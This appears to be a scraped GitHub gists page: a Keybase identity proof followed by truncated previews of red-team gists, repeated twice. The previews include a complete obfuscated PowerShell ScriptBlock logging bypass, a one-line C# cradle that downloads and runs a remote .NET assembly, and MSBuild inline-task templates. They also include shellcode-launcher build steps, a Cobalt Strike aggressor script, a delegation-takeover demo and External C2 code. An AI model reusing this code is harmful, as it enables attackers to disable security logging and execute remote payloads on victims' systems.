luxcupitor

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                luxcupitor
                / keybase.md
            
            
              Created
              April 14, 2016 19:20
            
              
                keybase.md
              
          
    Keybase proof

I hereby claim:

I am luxcupitor on github.
I am luxcupitor (https://keybase.io/luxcupitor) on keybase.
I have a public key whose fingerprint is 6BDD C78C 4EBB 00CD 1CF8  946B 8176 AD22 5F33 0312

To claim this, I am signing this object:

  
## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## msBuildDemo.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="DemoClass">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
      <Code Type="Class" Language="cs">

## csharpfun.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Business">
   <BusinessTime />
  </Target>
<UsingTask
    TaskName="BusinessTime"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>

## DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

## _.buildsteps.txt
1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library C:\Tools\shellcodeLauncher.cs
2. DotNetToJScript.exe --lang=JScript --ver=v4 -c ShellCodeLauncher.Program C:\Tools\shellcodeLauncher.dll

## sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

alias sharpgen{
	$executionId  = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp =  $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";

## rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

## transformFile.py
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#

import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode

## external_controller.py
import socket
import struct
import time

class ExternalC2Controller:
    def __init__(self, port):
        self.port = port

    def encodeFrame(self, data):
        return struct.pack("<I", len(data)) + data
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="DemoClass">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs">
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="Business">
	<BusinessTime />
	</Target>
	<UsingTask
	TaskName="BusinessTime"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<ParameterGroup/>
	<Task>
	1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library C:\Tools\shellcodeLauncher.cs
	2. DotNetToJScript.exe --lang=JScript --ver=v4 -c ShellCodeLauncher.Program C:\Tools\shellcodeLauncher.dll
	$dotnetpath = "/usr/local/share/dotnet/dotnet";
	$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
	$temppath = "/tmp/";

	beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

	alias sharpgen{
	$executionId = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp = $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";
	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"
	#!/usr/bin/python
	# -- coding: utf8 --
	#
	# Author: Arno0x0x, Twitter: @Arno0x0x
	#

	import argparse
	from Crypto.Cipher import AES
	import pyscrypt
	from base64 import b64encode
	import socket
	import struct
	import time

	class ExternalC2Controller:
	def __init__(self, port):
	self.port = port

	def encodeFrame(self, data):
	return struct.pack("<I", len(data)) + data